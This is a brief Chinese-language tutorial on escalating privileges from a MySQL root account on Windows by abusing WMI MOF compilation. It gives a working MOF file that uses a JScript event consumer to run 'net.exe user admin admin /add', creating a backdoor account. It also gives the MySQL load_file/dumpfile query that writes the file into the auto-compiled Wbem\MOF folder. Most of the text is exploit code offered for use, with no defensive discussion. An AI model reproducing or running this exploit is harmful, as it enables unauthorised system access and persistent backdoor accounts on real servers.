MySQL提权之MOF

0x01 前言

Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式（MOF）文件：

• 将MOF文件执行为命令行参数及Mofcomp.exe文件
• 使用IMofCompiler接口和$CompileFile方法
• 拖放到%SystemRoot%\System32\Wbem\MOF文件夹下的MOF文件中

使用MOF提权的前提是当前root账户可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下。

0x02 漏洞利用方法

1. 将一下代码保存为nullevt.mof文件

   #pragma namespace("\\.\root\subscription")
   instance of __EventFilter as $EventFilter
   {
   EventNamespace = "Root\\Cimv2";
   Name  = "filtP2";
   Query = "Select * From __InstanceModificationEvent "
   "Where TargetInstance Isa \"Win32_LocalTime\" "
   "And TargetInstance.Second = 5";
   QueryLanguage = "WQL";
   };
   
   instance of ActiveScriptEventConsumer as $Consumer
   {
   Name = "consPCSV2";
   ScriptingEngine = "JScript";
   ScriptText =
   "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
   };
   
   instance of __FilterToConsumerBinding
   {
   Consumer   = $Consumer;
   Filter = $EventFilter;
   };

2. 通过MySQL查询将文件导入

select load_file('c:\\recycler\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

导入后，系统会自动运行该文件。